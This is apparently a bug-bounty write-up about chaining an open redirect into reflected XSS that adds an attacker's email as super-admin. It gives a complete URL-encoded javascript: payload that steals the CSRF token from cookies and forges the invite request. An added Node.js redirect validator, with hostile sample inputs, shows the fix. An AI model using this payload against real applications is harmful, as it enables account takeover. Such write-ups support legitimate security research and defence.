How I Leveraged XSS to Escalate Privileges to Super Admin!

Finding The XSS:

Checking whether there is a parameter, or anything else, related to the main scope:
  1. Tried to exploit SSRF, but it was redirecting me to my localhost; I tried some SSRF payloads, with no result!
  2. Tried to find an Open Redirect. When one works, I usually check whether I can leverage it into Reflected XSS, and this time it worked for me!

Checking Possible Functions:

  1. A change-email function that does not ask the user for their current password, which is great, right?!
    Yes, but it requires the user to visit the confirmation link that will be sent to the email address. I think it could be exploitable, but the PoC would be more complex, so let it be our last choice!
  2. A function that sends an invitation to any user to add them to the same account, either as a restricted-privilege user or, optionally, as a Super Admin! Nooooice one! Let's do it!

Checking the Request:

  • A GET parameter, PID, holding the current user's ID.
  • An X-Example-CSRF header carrying the CSRF token.
  • A JSON request body containing the email address to invite together with the desired role.

JavaScript Payload:

https://app.example.com/path/to/authenticate?referer=javascRipt%3avar+email%3d+"attacher%40email.com"%3bvar+csrf%3d+document.cookie.split('%3b+').find(row+%3d>+row.startsWith('example-csrf')).split('%3d')[1]%3bvar+pid%3d+document.cookie.split('%3b+').find(row+%3d>+row.startsWith('USER_ID')).split('%3d')[1]%3bvar+http%3dnew+XMLHttpRequest()%3bhttp.open('POST','https%3a//api.example.com/app/v1/users/add/%3fPid%3d'%2bpid%2b'%26clienttimeout=14000%26app=users%26version=1.0',+true)%3bhttp.withCredentials%3dtrue%3bhttp.setRequestHeader('X-example-CSRF',csrf)%3bhttp.setRequestHeader('Content-type','application/json')%3bhttp.send('{"users"%3a[{"email"%3a"'%2bemail%2b'","emailSent"%3atrue,"firstName"%3a"","lastName"%3a"","roleNames"%3a[],"jita"%3afalse,"expiresAt"%3anull,"primaryTeamId"%3a-1,"secondaryTeamIds"%3a[],"partner"%3afalse,"pending"%3afalse,"existingInexample"%3afalse,"hasTwoFactorBackupCodes"%3afalse,"hasTwoFactorConfigured"%3afalse,"userAssetsCount"%3anull,"scim"%3afalse}],"roleNames"%3a["super-admin"],"teamId"%3anull,"secondaryTeamIds"%3a[],"sendWelcomeEmail"%3atrue,"forceWelcomeEmail"%3atrue}')%3b
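The `referer` value above is accepted as a redirect target, and `javascript:` is a valid URL scheme, so the open redirect became reflected XSS; everything the payload then does (reading the CSRF token and user ID from cookies, calling the invite API with the super-admin role) runs inside the victim's session, so the CSRF header is no obstacle. The fix belongs at the redirect, not at the CSRF check. As an added example that is not part of the original write-up, here is a Node.js validator for such a redirect parameter: it lets the URL parser normalise the input, then allows only http(s) targets on the application's own origin and returns a path it built itself. The origin `https://app.example.com`, the default path and the function name `safeRedirectTarget` are my own assumptions.

```javascript
// Added example (not from the original write-up): allowlist validation of a
// redirect-target parameter such as `referer` in the URL above.
// APP_ORIGIN and DEFAULT_PATH are assumed values for illustration.

const APP_ORIGIN = "https://app.example.com"; // assumed application origin
const DEFAULT_PATH = "/"; // safe landing page used whenever the target is rejected

function safeRedirectTarget(raw, appOrigin = APP_ORIGIN) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) {
    return DEFAULT_PATH;
  }

  // Do not string-match the raw input: "javascRipt:" or " java\tscript:" are
  // still the javascript: scheme once parsed. The WHATWG URL parser strips
  // surrounding whitespace and embedded tabs/newlines and lowercases the scheme.
  let url;
  try {
    // Resolving against the app origin turns relative paths into absolute URLs
    // and exposes the host behind protocol-relative inputs ("//evil.example").
    url = new URL(raw, appOrigin);
  } catch {
    return DEFAULT_PATH; // unparseable input
  }

  if (url.protocol !== "https:" && url.protocol !== "http:") {
    return DEFAULT_PATH; // javascript:, data:, vbscript:, file:, ...
  }

  if (url.origin !== new URL(appOrigin).origin) {
    return DEFAULT_PATH; // off-site redirect (also catches "http://" downgrades)
  }

  // Return only path, query and fragment rebuilt from the parsed URL, never the
  // caller's original string, so what ends up in the Location header is ours.
  return url.pathname + url.search + url.hash;
}

// Constructed sample inputs: the first two are legitimate, the rest are the
// kinds of values that turned the redirect into XSS or an off-site hop.
const constructedSamples = [
  "/dashboard",
  "https://app.example.com/settings?tab=users",
  "javascRipt:alert(1)",
  " java\tscript:alert(1)",
  "//attacker.example/phish",
  "https://attacker.example/",
  "data:text/html,<script>alert(1)</script>",
];

for (const sample of constructedSamples) {
  console.log(JSON.stringify(sample), "->", safeRedirectTarget(sample));
}
```

Comparing `url.origin` on the parsed result (rather than checking that the raw string starts with a slash) is what defeats the `//host` and `/\host` variants, because the parser resolves both to a foreign host before the comparison runs.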

Computer Engineering Student | Bug Hunter | CTF Player | AKA Melotover

Asem Eleraky